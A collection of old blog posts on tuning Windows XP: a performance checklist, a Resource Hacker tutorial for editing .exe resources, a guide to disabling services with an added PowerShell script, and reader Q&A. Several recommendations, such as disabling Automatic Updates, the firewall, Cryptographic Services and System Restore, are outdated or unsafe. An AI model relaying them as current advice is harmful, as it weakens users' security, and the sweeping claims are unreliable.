3.) Ensure that Windows XP is utilizing the NTFS file system. If you're not sure, here's how to check: First, double-click the My Computer icon, right-click on the C: Drive, then select Properties. Next, examine the File System type; if it says FAT32, then back-up any important data. Next, click Start, click Run, type CMD, and then click OK. At the prompt, type CONVERT C: /FS:NTFS and press the Enter key. This process may take a while; it's important that the computer be uninterrupted and virus-free. The file system used by the bootable drive will be either FAT32 or NTFS. I highly recommend NTFS for its superior security, reliability, and efficiency with larger disk drives.

4.) Disable file indexing. The indexing service extracts information from documents and other files on the hard drive and creates a "searchable keyword index." As you can imagine, this process can be quite taxing on any system.

The idea is that the user can search for a word, phrase, or property inside a document, should they have hundreds or thousands of documents and not know the file name of the document they want. Windows XP's built-in search functionality can still perform these kinds of searches without the Indexing service. It just takes longer. The OS has to open each file at the time of the request to help find what the user is looking for.

Most people never need this feature of search. Those who do are typically in a large corporate environment where thousands of documents are located on at least one server. But if you're a typical system builder, most of your clients are small and medium businesses. And if your clients have no need for this search feature, I recommend disabling it.

Here's how: First, double-click the My Computer icon. Next, right-click on the C: Drive, then select Properties. Uncheck "Allow Indexing Service to index this disk for fast file searching." Next, apply changes to "C: subfolders and files," and click OK. If a warning or error message appears (such as "Access is denied"), click the Ignore All button.

5.) Update the PC's video and motherboard chipset drivers. Also, update and configure the BIOS. For more information on how to configure your BIOS properly, see this article on my site.

6.) Empty the Windows Prefetch folder every three months or so. Windows XP can "prefetch" portions of data and applications that are used frequently. This makes processes appear to load faster when called upon by the user. That's fine. But over time, the prefetch folder may become overloaded with references to files and applications no longer in use. When that happens, Windows XP is wasting time, and slowing system performance, by pre-loading them. Nothing critical is in this folder, and the entire contents are safe to delete.

7.) Once a month, run a disk cleanup. Here's how: Double-click the My Computer icon. Then right-click on the C: drive and select Properties. Click the Disk Cleanup button -- it's just to the right of the Capacity pie graph -- and delete all temporary files.

8.) In your Device Manager, double-click on the IDE ATA/ATAPI Controllers device, and ensure that DMA is enabled for each drive you have connected to the Primary and Secondary controller. Do this by double-clicking on Primary IDE Channel. Then click the Advanced Settings tab. Ensure the Transfer Mode is set to "DMA if available" for both Device 0 and Device 1. Then repeat this process with the Secondary IDE Channel.

9.) Upgrade the cabling. As hard-drive technology improves, the cabling requirements to achieve these performance boosts have become more stringent. Be sure to use 80-wire Ultra-133 cables on all of your IDE devices with the connectors properly assigned to the matching Master/Slave/Motherboard sockets. A single device must be at the end of the cable; connecting a single drive to the middle connector on a ribbon cable will cause signaling problems. With Ultra DMA hard drives, these signaling problems will prevent the drive from performing at its maximum potential. Also, because these cables inherently support "cable select," the location of each drive on the cable is important. For these reasons, the cable is designed so drive positioning is explicitly clear.

10.) Remove all spyware from the computer. Use free programs such as AdAware by Lavasoft or SpyBot Search & Destroy. Once these programs are installed, be sure to check for and download any updates before starting your search. Anything either program finds can be safely removed. Any free software that requires spyware to run will no longer function once the spyware portion has been removed; if your customer really wants the program even though it contains spyware, simply reinstall it. For more information on removing Spyware visit this Web Pro News page.

11.) Remove any unnecessary programs and/or items from Windows Startup routine using the MSCONFIG utility. Here's how: First, click Start, click Run, type MSCONFIG, and click OK. Click the StartUp tab, then uncheck any items you don't want to start when Windows starts. Unsure what some items are? Visit the WinTasks Process Library. It contains known system processes, applications, as well as spyware references and explanations. Or quickly identify them by searching for the filenames using Google or another Web search engine.

12.) Remove any unnecessary or unused programs from the Add/Remove Programs section of the Control Panel.

13.) Turn off any and all unnecessary animations, and disable active desktop. In fact, for optimal performance, turn off all animations. Windows XP offers many different settings in this area. Here's how to do it: First click on the System icon in the Control Panel. Next, click on the Advanced tab. Select the Settings button located under Performance. Feel free to play around with the options offered here, as nothing you can change will alter the reliability of the computer -- only its responsiveness.

14.) If your customer is an advanced user who is comfortable editing their registry, try some of the performance registry tweaks offered at Tweak XP.

15.) Visit Microsoft's Windows update site regularly, and download all updates labeled Critical. Download any optional updates at your discretion.

16.) Update the customer's anti-virus software on a weekly, even daily, basis. Make sure they have only one anti-virus software package installed. Mixing anti-virus software is a sure way to spell disaster for performance and reliability.

17.) Make sure the customer has fewer than 500 type fonts installed on their computer. The more fonts they have, the slower the system will become. While Windows XP handles fonts much more efficiently than did the previous versions of Windows, too many fonts -- that is, anything over 500 -- will noticeably tax the system.

18.) Do not partition the hard drive. Windows XP's NTFS file system runs more efficiently on one large partition. The data is no safer on a separate partition, and a reformat is never necessary to reinstall an operating system. The same excuses people offer for using partitions apply to using a folder instead. For example, instead of putting all your data on the D: drive, put it in a folder called "D drive." You'll achieve the same organizational benefits that a separate partition offers, but without the degradation in system performance. Also, your free space won't be limited by the size of the partition; instead, it will be limited by the size of the entire hard drive. This means you won't need to resize any partitions, ever. That task can be time-consuming and also can result in lost data.

19.) Check the system's RAM to ensure it is operating properly. I recommend using a free program called MemTest86. The download will make a bootable CD or diskette (your choice), which will run 10 extensive tests on the PC's memory automatically after you boot to the disk you created. Allow all tests to run until at least three passes of the 10 tests are completed. If the program encounters any errors, turn off and unplug the computer, remove a stick of memory (assuming you have more than one), and run the test again. Remember, bad memory cannot be repaired, but only replaced.

20.) If the PC has a CD or DVD recorder, check the drive manufacturer's Web site for updated firmware. In some cases you'll be able to upgrade the recorder to a faster speed. Best of all, it's free.

21.) Disable unnecessary services. Windows XP loads a lot of services that your customer most likely does not need. To determine which services you can disable for your client, visit the Black Viper site for Windows XP configurations.

22.) If you're sick of a single Windows Explorer window crashing and then taking the rest of your OS down with it, then follow this tip: open My Computer, click on Tools, then Folder Options. Now click on the View tab. Scroll down to "Launch folder windows in a separate process," and enable this option. You'll have to reboot your machine for this option to take effect.

23.) At least once a year, open the computer's case and blow out all the dust and debris. While you're in there, check that all the fans are turning properly. Also inspect the motherboard capacitors for bulging or leaks. For more information on this leaking-capacitor phenomenon, you can read numerous articles on my site.

Following any of these suggestions should result in noticeable improvements to the performance and reliability of your customers' computers. If you still want to defrag a disk, remember that the main benefit will be to make your data more retrievable in the event of a crashed drive.

Sunday, July 11, 2010

How to modify *.exe files

Learn how to change *.exe files in 5 easy steps:

1) Don't try to modify a program by editing its source in a disassembler. Why?
Because that's for programmers and assembly experts only.

If you try to view it in hex, you'll only get tons of crap you don't understand.
First off, you need Resource Hacker (latest version). It's a resource editor,
very easy to use. You can download it at h**p://www.users.on.net/johnson/resourcehacker/

2) Unzip the archive, and run ResHacker.exe. You can check out the help file too

3) You will see that the interface is simple and clean. Go to the menu File > Open or press Ctrl+O to open a file. Browse your way to the file you would like to edit. You can edit *.exe, *.dll, *.ocx, *.scr and *.cpl files, but this tutorial is to teach you how to edit *.exe files, so open one.

4) In the left side of the screen a list of sections will appear.
The most common sections are
-String table;
-RCData;
-Dialog;
-Cursor group;
-Bitmap;
-WAV.
*Icon: You can view and change the icon(s) of the program by double-clicking the icon section, choosing the icon, right-clicking on it and pressing "replace resource". After that you can choose the icon you want to replace the original with.
*String table: a bunch of crap, useful sometimes, basic programming knowledge needed.
*RCData: Here the real hacking begins. Modify window titles, buttons, text, and lots more!
*Dialog: Here you can modify the messages or dialogs that appear in a program. Don't forget to press "Compile" when you're done!
*Cursor group: Change the mouse cursors used in the program just like you would change the icon.
*Bitmap: View or change images in the program easily!
*WAV: Change the sounds in the program with your own.

5) In the RCData, Dialog, Menu and String table sections you can make a lot of changes. You can modify or translate the text, change links, change buttons, etc.

TIP: To change a window title, search for something like: CAPTION "edit this".
TIP: After all operations press the "Compile Script" button, and when you're done editing, save your work at File > Save (Save as).
TIP: When you save a file, the original file will be backed up by default and renamed to Name_original, and the saved file will have the normal name of the changed program.
TIP: Sometimes you may get a message like: "This program has a non-standard resource layout... it has probably been compressed with an .EXE compressor." That means that Resource Hacker can't modify it because of its structure.

Sunday, July 4, 2010

HOW TO STOP UNNECESSARY SERVICES IN WIN XP

 

Turning off unnecessary services in Windows XP can greatly reduce your exploit risk, while improving system performance. This is a good time to interject that vendors often like to push all sorts of "download optimizers" and other cute programs on users. Most of the time, installing such things slows your computer down at best. It could subject you to potential security risks. The first rule is "If you don't know you need it, you probably don't."

Unnecessary services don't just subject you to security risk. They also slow down the operation of your computer. So, don't get lazy here and think you can just deal with the infections later. Go ahead and turn that junk off and recapture your system from these resource hogs. You get to services by going to Control Panel, Administrative Tools, then Services. You should see a long list of services, some running and some dormant. Use this checklist to help determine which services you can live without.

If you don't know how to find Windows Services in Windows XP, click on Start, Control Panel, Administrative Tools, and Services. Below is a simple step-by-step guide to finding and changing your services on Windows XP. Keep in mind that your view settings may make yours appear slightly different, but the basic path will be the same.

1) Click on Start, then click on Control Panel.
2) In Control Panel, click on Administrative Tools.
3) In Administrative Tools, click on Services.
4) Choose the service you wish to modify.

Changing the Service Settings

Once you select the service you wish to modify, you have several buttons to turn the service off immediately, and drop-down choices to disable a service, make it automatic, or make it manual.

Windows XP Pro (and Home); Stuff to turn off:

Each service is listed as it is in Microsoft's Windows XP Professional. These should be similar in Microsoft's XP Home as well. Under each is the definition given in the Services Manager.

  • Alerter
    Notifies selected users and computers of administrative alerts. If the service is stopped, programs that use administrative alerts will not receive them. If this service is disabled, any services that explicitly depend on it will fail to start.

    Comment: I don't want my personal computer telling me anything, ever. Shut up and work! There's few things I find more annoying than a computer constantly wanting to interact with me while I'm using it to do work or entertain myself. A computer is a tool, not a friend or work companion. No Hal, I don't want to talk to you. Perhaps there's a software vendor that can give you a compelling reason why you need this service, but for most home and SOHO PC use it's just an unnecessary service taking up resources and providing risk. Unless you are running a product that requires this service, disable it.

    Updated comment: Someone emailed me to say that if you're on a network where you are required to update your password periodically, failing to do so will generate a notice [if] you have this service enabled. If not, then obviously, your annoying local network won't warn you that you need to change your password and thus you'll get locked out. I've not tested this. But, if you have such a service on your network, you should refer to other admonitions in this article and leave managing your desktop to your IT staff(er). If you're a home network or don't know, read the paragraph above and use personal judgment.

  • Application Layer Gateway Service
    Provides support for 3rd party protocol plug-ins for Internet Connection Sharing and the Internet Connection Firewall

    Comment: Do you want to share your internet connection? That's an article waiting to be written. Let me be clear. Since you can buy a router for $50 or less, and Windows does an awful job routing, using a computer to gateway your other computers to the internet is just stupid. "What about firewalling and admission control?" Well, that's not going to be done through the built-in internet sharing tools. So, we're not talking about that. If you use a personal computer to gateway your other computers to the internet (and calling it a server doesn't change the reality), you are wasting resources. Buy a $50 router, or a $1000 router for that matter. But, buy a discrete device that is designed to do the job. Use hardware based firewalling (OK, it's all based on software - but I mean a boxed solution, not software installed on a PC that's prone to lose autonomy). And, what about all those cute third-party firewalling tools that plug in to this thing? Man, give me a break. If it runs on top of your Windows installation, it's not a real firewall. Unless this is required by a product you think is necessary, disable it.

  • Automatic Updates
    Enables the download and installation of critical Windows updates. If the service is disabled, the operating system can be manually updated.

    Comment: There's only two options that may make sense with this service. You should either set it to disable or manual. I'd disable it. Automatic Updates is designed as a tool to aid Microsoft in controlling their product. Props to Microsoft for trying to protect their product from piracy. But, some updates have been known to cause problems. Use it when you need it, and disable it when you don't, unless you're too lazy to do updates on your own. Don't you wonder why all the computers in big, well managed networks don't run Automatic Updates? It's mostly because managers of big networks create their own update policies. If you more completely understand the thinking that goes into deciding whether or not to distribute an update, you could better administer your own PC. Either turn it on and assume the risk, or turn it off and regularly visit Microsoft's update and news page (discussed more below).

  • Background Intelligent Transfer Service
    Uses idle network bandwidth to transfer data.

    Comment: This is one of those tools they require you turn on to enable Automatic Updates. Think about it. It connects your PC to the internet or network and works behind your back to do stuff you didn't explicitly tell it to do. It sounds like a great tool to help hackers collect data from your PC and slowly seep it back to their lair. Unless it's immediately required, disable it. If you use it and then go for some time with no need to use it, disable it. If you can't remember to keep your PC updated with the latest security fixes, you'll need it.

  • ClipBook
    Enables ClipBook Viewer to store information and share it with remote computers. If the service is stopped, ClipBook Viewer will not be able to share information with remote computers. If this service is disabled, any services that explicitly depend on it will fail to start.

    Comment: So, you want to copy stuff to your clipbook and allow remote computers to access it? I don't. There may be a software vendor that requires this service to run. I've yet to find it useful. I suggest you disable it.

  • Computer Browser
    Maintains an updated list of computers on the network and supplies this list to computers designated as browsers. If this service is stopped, this list will not be updated or maintained. If this service is disabled, any services that explicitly depend on it will fail to start.

    Comment: If you are on a network with other computers, and need to see them, this may be a useful tool. Otherwise, disable it.

  • Cryptographic Services
    Provides three management services: Catalog Database Service, which confirms the signatures of Windows files; Protected Root Service, which adds and removes Trusted Root Certification Authority certificates from this computer; and Key Service, which helps enroll this computer for certificates. If this service is stopped, these management services will not function properly. If this service is disabled, any services that explicitly depend on it will fail to start.

    Comment: It is very necessary if you are passing certificates for networking. Unless you are in a large corporate network where connections are managed through authentication, this is unnecessary; disable it.

  • Distributed Transaction Coordinator
    Coordinates transactions that span multiple resource managers, such as databases, message queues, and file systems. If this service is stopped, these transactions will not occur. If this service is disabled, any services that explicitly depend on it will fail to start.

    Comment: Extremely few personal computers will require this service. If you use it, you may want to review the reasons it is being used. Unless you are accessing network filesystems and databases, disable it.

  • DNS Client
    Resolves and caches Domain Name System (DNS) names for this computer. If this service is stopped, this computer will not be able to resolve DNS names and locate Active Directory domain controllers. If this service is disabled, any services that explicitly depend on it will fail to start.

    Comment: It's typically good to leave this on.

  • Error Reporting Service
    Allows error reporting for services and applications running in non-standard environments.

    Comment: Error reporting is very useful, if you know what to do with the errors or you are running software that adjusts based on error reporting. This is that annoying "feature" in Windows that constantly pops up wanting to ship information about your software failures to Redmond. People promise me it helps find problems and solutions. I've mostly seen problem reports that you could as easily search out yourself. If you're advanced enough to use this, you'll likely use a search engine just as well. Chances are, the best thing for you to do is disable it.

  • Help and Support
    Enables Help and Support Center to run on this computer. If this service is stopped, Help and Support Center will be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start.

    Comment: I don't find this service useful, other than sucking up resources. If you know how to use Google, I'd disable it.

  • Human Interface Device Access
    Enables generic input access to Human Interface Devices (HID), which activates and maintains the use of predefined hot buttons on keyboards, remote controls, and other multimedia devices. If this service is stopped, hot buttons controlled by this service will no longer function. If this service is disabled, any services that explicitly depend on it will fail to start.

    Comment: Whether or not you should disable this service depends on other services you need. If you don't know, turn it off and see if it breaks anything. It says that it deals with hotkeys, however all the system hotkeys that most of us enjoy aren't controlled by this service, they are built into the core OS. Control C, for example, to copy and Control V to paste, do not stop working when you turn this service off. It seems this has more to do with specific hotkeys that a software vendor may want to insert into their installed program or internet product. Until you see a reason for it, I'd turn this one off. Personally, I consider relying on such services to be lazy programming. But, there may be good reason for using it if it's more efficient.

  • Indexing Service
    Indexes contents and properties of files on local and remote computers; provides rapid access to files through flexible querying language.

    Comment: To date, nobody has shown me real system performance improvements with this technology. Keep in mind, I'm limited in this conversation to Windows. Indexing is very useful. Indexing databases is very useful. Indexing your computer isn't very useful at all. Typically, if you are on a network, you know where on a network to find your chosen data. If you are not on a network, there's no real performance enhancement to this service that justifies the complexity and resource use. Chances are good you should disable it.

  • IMAPI CD-Burning COM Service
    Manages CD recording using Image Mastering Applications Programming Interface (IMAPI). If this service is stopped, this computer will be unable to record CDs. If this service is disabled, any services that explicitly depend on it will fail to start.

    Comment: Obviously, there may be some usefulness leaving this service as manual, if you have a CD burner installed. If you don't, disable it.

  • Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)
    Provides network address translation, addressing, name resolution and/or intrusion prevention services for a home or small office network.

    Comment: This tool does a great job of complicating my internet connection and slowing down transactions. It's not likely this tool is sophisticated enough to make a major impact in your system's performance. You should disable it.

  • Messenger
    Transmits net send and Alerter service messages between clients and servers. This service is not related to Windows Messenger. If this service is stopped, Alerter messages will not be transmitted. If this service is disabled, any services that explicitly depend on it will fail to start.

    Comment: Turn this thing off! It's a simple kit for anybody that can connect via any network to your computer to access your system and do things you don't want them to. Disable it.

  • Net Logon
    Supports pass-through authentication of account logon events for computers in a domain.

    Comment: Unless you need this to operate inside a domain, it's likely not necessary or useful. If you are using a home or SOHO PC and don't have a local domain based network, disable it.

  • NetMeeting Remote Desktop Sharing
    Enables an authorized user to access this computer remotely by using NetMeeting over a corporate intranet. If this service is stopped, remote desktop sharing will be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start.

    Comment: Do you really want a built in tool to share control of your desktop over your network connection? There are better tools for doing this kind of work, if needed. If someone you buy software from insists you let them use this tool to help you install it one time, then enable it and disable it immediately afterward. For typical use, you should disable it.

  • Remote Desktop Help Session Manager
    Manages and controls Remote Assistance. If this service is stopped, Remote Assistance will be unavailable. Before stopping this service, see the Dependencies tab of the Properties dialog box.

    Comment: Refer to NetMeeting. If you don't want to share control of your computer through your network, disable it.

  • Remote Procedure Call (RPC) Locator
    Manages the RPC name service database.

    Comment: There are some network programs and protocols that require this to be turned on. Chances are you could just turn it off and see if you break anything. If you are using a single PC in your home or SOHO, it's likely just a security risk. If you don't know you need it, disable it.

  • Remote Registry
    Enables remote users to modify registry settings on this computer. If this service is stopped, the registry can be modified only by users on this computer. If this service is disabled, any services that explicitly depend on it will fail to start.

    Comment: Seems self-explanatory. You can enable this service to help remote people or programs change your registry. Great hacker tool if you can't secure it. Disable it.

  • System Restore Service
    Performs system restore functions. To stop service, turn off System Restore from the System Restore tab in My Computer->Properties

    Comment: This is almost useless if you ever have a problem with damaged drives, corrupted data, or malware. It uses a lot of resources and isn't useful for most people. You can turn it on before you install a big piece of software. This service allows you to back up to a previous system should you mess yours up with an installation of software or a modification to your system settings, usually registry damage. To improve system performance and take the minor risk of not being able to make your computer work like it did yesterday, disable it.

  • TCP/IP NetBIOS Helper
    Enables support for NetBIOS over TCP/IP (NetBT) service and NetBIOS name resolution.

    Comment: Very few people use NetBIOS at home. This is the Windows built-in protocol for simple networking. You may need it. Otherwise, disable it.

  • Telephony
    Provides Telephony API (TAPI) support for programs that control telephony devices and IP based voice connections on the local computer and, through the LAN, on servers that are also running the service.

    Comment: If you use telephony, you probably use discrete devices or proprietary services that don't rely on this service. However, you do need this service if you use a modem to connect to the internet. It's required by all sorts of hardware you wouldn't think require it, including accessing the internet via 3G telephones as tethered modems. Set this service to automatic to be safe.

  • Telnet
    Enables a remote user to log on to this computer and run programs, and supports various TCP/IP Telnet clients, including UNIX-based and Windows-based computers. If this service is stopped, remote user access to programs might be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start.

    Comment: There's just not a circumstance where I can imagine that turning this service on is a good idea. Unless you need to let people telnet into your computer and have a really good reason for doing so, disable it.

  • Terminal Services
    Allows multiple users to be connected interactively to a machine as well as the display of desktops and applications to remote computers. The underpinning of Remote Desktop (including RD for Administrators), Fast User Switching, Remote Assistance, and Terminal Server.

    Comment: As I've said above, there are better tools for remote desktop administration. The idea of Terminal Services is to allow remote desktop administration of a system, like the user was on the actual console. In almost all circumstances you should disable it.

  • Themes
    Provides user experience theme management.

    Comment: Themes are cute and bloated. Enabling themes is not a good way to increase performance, but you may think it's neat. If you aren't addicted to cute desktop eye candy, disable it.

  • Uninterruptible Power Supply
    Manages an uninterruptible power supply (UPS) connected to the computer.

    Comment: Unless you are using a UPS on your computer and it has the capability of managing the system, disable it.

  • Upload Manager
    Manages synchronous and asynchronous file transfers between clients and servers on the network. If this service is stopped, synchronous and asynchronous file transfers between clients and servers on the network will not occur. If this service is disabled, any services that explicitly depend on it will fail to start.

    Comment: If you are not in a local network sharing data (files and/or services), disable it.

  • Windows Time
    Maintains date and time synchronization on all clients and servers in the network. If this service is stopped, date and time synchronization will be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start.

    Comment: Sometimes it works. Unless you are really needing your time to sync to something running a Windows time server, disable it.

  • Wireless Zero Configuration
    Provides automatic configuration for the 802.11 adapters

    Comment: Unless you use 802.11 devices, disable it.

  • Workstation
    Creates and maintains client network connections to remote servers. If this service is stopped, these connections will be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start.

    Comment: If you are not in a local network sharing data (files and/or services), disable it.

If you turn off all the services suggested above and try to use Automatic Updates via WindowsUpdate.Microsoft.com, you will likely see a message something like this:

Windows Update cannot continue because a required service application is disabled. Windows Update requires the following services:
Automatic Updates enables detection, downloading, and installation of critical updates for your computer.
Background Intelligent Transfer Service (BITS) enables faster, restartable downloading of updates.
Event Log logs Windows Update events for troubleshooting. To ensure that these services are enabled:

It's easy to just go back to Services, and turn these services on as you need them. An operating system shouldn't need daily updates to run. And, the more services you run, the more likely you are to need updates. See a circle here? Occasionally, a little laziness won't kill you. Though you could just go to Technet (Microsoft's only support for IT professionals) and get all your news and update files with descriptions of their efficacy and safety, you may occasionally just want to veg out and let Microsoft do the work for you. You should still read each update and decide for yourself whether it makes sense. Some of them are flat out bad news. But, turning up these services for a few minutes to run Automatic Updates may be a shortcut to periodic updates.

So, let's look at the services they want you to turn on.

  1. Automatic Updates
  2. Background Intelligent Transfer Service
  3. Event Log

I haven't a clue why you need Background Intelligent Transfer Services to run so you can go to a website, download, and install service packs. But, you can turn it, and the others, on and then turn it back off when you are done. After all, it's just three services.

If you take a minimalist's point of view to running both software and services on your computer, it will perform faster and more safely than it will if you just randomly load anything anyone tells you to. To better secure your PC, stick to a mindset that if you don't absolutely need a service running right now, you should just turn it off.

For those of you that break stuff when you turn off services I suggest are unnecessary.

If you turn off all the stuff that blatantly doesn't have anything to do with the network, you should be fine. Then, turn off one thing at a time that you /think/ doesn't support your network connection. If you lose your connection, turn the service back on. Next, and this part is very important, make sure your network settings are accurate and set for "on" so you can reconnect. You should find out how your PC connects to your local network before you get started and document it. But, anything you turn off that breaks something needs to be carefully examined and documented (write it down somewhere).

Just because you turn a service back on doesn't mean your broken software will magically start working again. For example, remember the issue of using a computer in your network to manage your connection? If that's how you connect, you'll have to reconfigure that connection to get online if you kill it by killing a service. Likely, Computer Browser will cause this kind of problem. Also, just enabling the service doesn't turn it on. You need to manually restart it, since the start, enable, and stop settings go into action on bootup. So, if you don't want to wait until your box reboots, you'll need to manually turn off the service if you want it disabled, and manually turn it on if you want to enable it (and see if that given service is your problem).
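
The document-first, disable-and-stop, and restore steps described above, as an added PowerShell example that is not part of the original article. It assumes PowerShell 2.0 or later in an elevated session; the short service names (for Remote Registry, Telnet and Messenger), the baseline file path and the function names are choices made for this example.

```powershell
# Added example, not from the original article. Run from an elevated prompt.
# WMI is used so the script also works on PowerShell 2.0.
# Assumptions: the three short names below (Remote Registry, Telnet, Messenger)
# and the CSV path; edit both to match your own list.
$Targets  = 'RemoteRegistry', 'TlntSvr', 'Messenger'
$Baseline = Join-Path $env:USERPROFILE 'service-baseline.csv'

function Save-ServiceBaseline {
    # Document start mode and state of every service before changing anything.
    # Never overwrite an existing baseline, or the original settings are lost.
    if (Test-Path $Baseline) { return }
    Get-WmiObject Win32_Service |
        Select-Object Name, DisplayName, StartMode, State |
        Export-Csv -Path $Baseline -NoTypeInformation
}

function Disable-ServiceNow([string]$Name) {
    $svc = Get-WmiObject Win32_Service -Filter "Name='$Name'"
    if (-not $svc) { Write-Warning "$Name is not installed"; return }

    # Services that depend on this one fail to start once it is disabled.
    $deps = @((Get-Service -Name $Name).DependentServices |
        Where-Object { $_.Status -eq 'Running' } | ForEach-Object { $_.Name })
    if ($deps.Count -gt 0) {
        Write-Warning "$Name skipped, running dependents: $($deps -join ', ')"
        return
    }

    # The start mode only takes effect at the next boot...
    $rc = $svc.ChangeStartMode('Disabled').ReturnValue
    if ($rc -ne 0) { Write-Warning "ChangeStartMode failed for $Name (code $rc)"; return }

    # ...so the running instance has to be stopped as well.
    if ($svc.State -eq 'Running') {
        $rc = $svc.StopService().ReturnValue
        if ($rc -ne 0) { Write-Warning "StopService failed for $Name (code $rc)" }
    }
}

function Restore-ServiceFromBaseline([string]$Name) {
    $row = Import-Csv $Baseline | Where-Object { $_.Name -eq $Name }
    $svc = Get-WmiObject Win32_Service -Filter "Name='$Name'"
    if (-not $row -or -not $svc) { Write-Warning "No baseline or service for $Name"; return }

    # WMI reports 'Auto', but ChangeStartMode expects 'Automatic'.
    $mode = if ($row.StartMode -eq 'Auto') { 'Automatic' } else { $row.StartMode }
    $rc = $svc.ChangeStartMode($mode).ReturnValue
    if ($rc -ne 0) { Write-Warning "ChangeStartMode failed for $Name (code $rc)"; return }

    # Re-enabling does not start the service; start it if it was running before.
    if ($row.State -eq 'Running') {
        $rc = $svc.StartService().ReturnValue
        if ($rc -ne 0) { Write-Warning "StartService failed for $Name (code $rc)" }
    }
}

Save-ServiceBaseline
foreach ($t in $Targets) { Disable-ServiceNow $t }

# Verify the result. To undo one change: Restore-ServiceFromBaseline 'Messenger'
Get-WmiObject Win32_Service | Where-Object { $Targets -contains $_.Name } |
    Format-Table Name, StartMode, State -AutoSize
```

Changing one service at a time and checking the final table after each run keeps it obvious which change broke something.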

What about System Restore? Well, I don't like it. If I had a dollar for every time someone fouled up their PC, ran System Restore, and was amazed that all wasn't suddenly happy sunshine, I'd have a really nice vacation home. I realize it makes life easier for newbies that randomly screw stuff up and can't be hassled with learning the things they use. But, for most cases, it's a great tool for viruses and worms to avoid capture. You delete them, they have a backup switch to recapture control through the restore program. Many antivirus programs don't work properly when you have this feature enabled. You can leave it on if you're a fan. Perhaps it makes you feel good, like it would make everything right again if you had it around. But, it won't save you from a serious problem. Backups and safe computer practices will.

You need to learn enough about your PC to run a functional backup and restoration of your critical data. If you can't do this, you're just waiting to lose everything.

Don't be afraid to learn more about your PC. It's one thing to run through a checklist of stuff I suggest you don't need. But, it's not a guarantee that I address every concern for every user. With a few hours here and there of learning now, you'll save yourself a lot of frustration later. The things I learned about Windows five and six years ago still serve me today. The things I learned about networks running Unix systems serve me every day, no matter what operating system I may run.

Enjoy learning; it's the first line of defense against bad software and broken PCs.

[Check out Run a Faster Windows PC, now that you're done with this article.]

Latest comments:

Hi, three things, and I know I'm a few years late with the first, and maybe you've gotten it a few hundred times already, but I've only recently discovered your article on unnecessary services that windows... [snip]

You know, that article is really, really old. And, to be honest I don't update it and can't imagine why so many people read it. It makes me think I may should spend more time on things like that - keeping it current, etc. So, I will add comments down here as folk email me questions and comments.

You mention that Cryptographic Services is unnecessary unless you work in a large network atmosphere (or something along those lines), plus stuff about certificates.

[snip] ... is required for automatic updates.

I think this is recent behavior. Just yesterday I downloaded TweakUI for a friend and his WinXP complained the software wasn't signed... WHAT!? Microsoft didn't bother using their beloved signing technology even though they act as though anything that's not digitally signed is a trojan or virus? Amazing, but they don't retroactively utilize their own technologies and they often throw new requirements (often for "security" sake) on their old operating systems.

I actually changed my position on this and though it's dangerous on multiple levels, I think considering all it's almost required that you leave auto-updates running, since you can't possibly run a safe PC without daily update checks and who can be bothered to run updates manually every day. Microsoft doesn't exactly make downloading and installing them manually a simple process.

BTW, if you download the updates manually from TechNET, you don't need this service running - but that's not what you want to do, you just want to click a button and have your system automatically update. Automatic and automatic have different meanings here. I mean, the update you're trying to do with the click is automatic, and the update that happens without your involvement at all (scheduled automatic updates) is also automatic.

Telephony Services: you say it's unnecessary if you don't use a modem to connect to the internet, and I was like "Nah, I have cable because I'm t3h 133720r2!" and I tried to turn it off, and it won't turn off. And before I pressed the issue, a question came to mind- is a cable modem still a modem in the sense that you're referring to them? And if so... who the XXX is lucky enough to not need any modem at all to connect to Al Gore's miracle?! So that threw me off a bit.

Well... there's two answers to this question - the implied and the direct.

I used to have a "cable modem," but I used a network connection (via my NIC) to connect. I have DSL now and do the same. Most modern distributions of network connections (DSL/Cable/T1/etc.) use plain ole NICs to connect - some people install that awful driver software, and that //may// require this feature, though honestly I've not personally tested so I don't know for fact.

Let me tell you this - all kinds of crap uses telephony. VOIP, modems, fax, etc. all use it. Even my stupid fax printing software that sends the fax through //EMAIL// uses the telephony service.

Lastly, this one comes from the article you link to at the bottom of the unnecessary services article, about running a faster Windows PC. You suggest Avira Antivir to replace McAfee and Norton, and seeing as how you had thus far proven to be a pretty legitimate tech advisor (I started getting paranoid that in the stead of traditional viruses, people just give you "advice" to delete perfectly vital bits of software and whatnot), I jumped on the free version. I had been a McAfee noob, and had been increasingly frustrated with it.

Avira works great and all, but there's one little thing that drives me crazy that I can't seem to figure out. How the XXX do you get rid of the "Notifier of Avira" that constantly bugs you to buy the premium edition and reminds me of spyware/popups itself?

[snip] ...plenty, so I really can't justify working over 20 whole hard-earned dollars just to make what amounts to be a popup, from a program that is supposed to... [snip]

I'm afraid they've jumped onto the harassment bandwagon with their free product. It's annoying. And, to be honest I just plopped down the $40 and bought the commercial license of Avast recently. I suggest you do the same.

All antivirus companies eventually get dragged into the corporate profit game and leave the good antivirus arena. The fact is, it's not really considered a good growth model to stick to plain ole antivirus software. The big guys lead the track on bloatware, but everyone gets into it. They either offer more bells and whistles and harass you or harass you to spend more money on the basics. Once they feel that they've saturated the "I just want a good antivirus program" market, they start banging on your wallet.

But, for the moment, I'm happy with my commercial Avast.

As for forking over $20 to stop the harassment. I'm sorry, but as a capitalist I don't really mind this so much. And, to be honest $20 for protection without the CPU tax other big brands charge - gimping your entire machine for the promise of safer web browsing - it's a good deal. I'd pay the $20. It's worth it.